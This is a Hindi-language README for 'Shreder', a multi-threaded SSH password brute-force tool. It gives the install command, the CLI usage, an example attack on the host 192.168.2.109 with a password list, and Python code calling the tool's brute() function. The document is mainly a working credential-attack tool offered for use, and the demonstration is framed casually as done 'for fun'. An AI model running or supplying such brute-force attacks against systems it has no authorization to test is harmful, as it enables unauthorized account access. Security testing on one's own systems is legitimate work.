
Shreder एक शक्तिशाली मल्टी-थ्रेडेड SSH प्रोटोकॉल पासवर्ड ब्रूट-फोर्स टूल है।
Shreder एक शक्तिशाली मल्टी-थ्रेडेड SSH प्रोटोकॉल पासवर्ड ब्रूट-फोर्स टूल है।
0.1 सेकंड में एक पासवर्ड।1 मिनट और 40 सेकंड में 1000 पासवर्ड आज़माता है।pip3 install git+https://github.com/EntySec/Shreder
Shreder का उपयोग करने के लिए बस अपने टर्मिनल में shreder टाइप करें।
usage: shreder [-h] [-p PORT] [-u USERNAME] [-l LIST] [-d DELAY] target
Shreder is a powerful multi-threaded SSH protocol password brute-force tool.
positional arguments:
target
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT SSH port.
-u USERNAME, --username USERNAME
SSH username.
-l LIST, --list LIST Passwords list.
-d DELAY, --delay DELAY
Delay between login attempts.
एकल लक्ष्य पर ब्रूट-फोर्स करना
चलो मज़े के लिए मेरे डिवाइस पर ब्रूट-फोर्स करते हैं।
shreder 192.168.2.109 -u mobile -l passwords.txt
Shreder का अपना Python API भी है जिसे अपने कोड में Shreder आयात करके बुलाया जा सकता है।
from shreder import Shreder
यहाँ Shreder के सभी बुनियादी फंक्शन हैं जिनका उपयोग एकल लक्ष्य पर ब्रूट-फोर्स करने के लिए किया जा सकता है।
connect(host, port, username, password) - दिए गए पते से एकल लक्ष्य से कनेक्ट करें।brute(host, port, username, dictionary, delay) - दिए गए पते से एकल लक्ष्य पर ब्रूट-फोर्स करें।एकल लक्ष्य पर ब्रूट-फोर्स करना
from shreder import Shreder
shreder = Shreder()
password = shreder.brute('192.168.2.109', 22, 'mobile', 'passwords.txt')
print(password)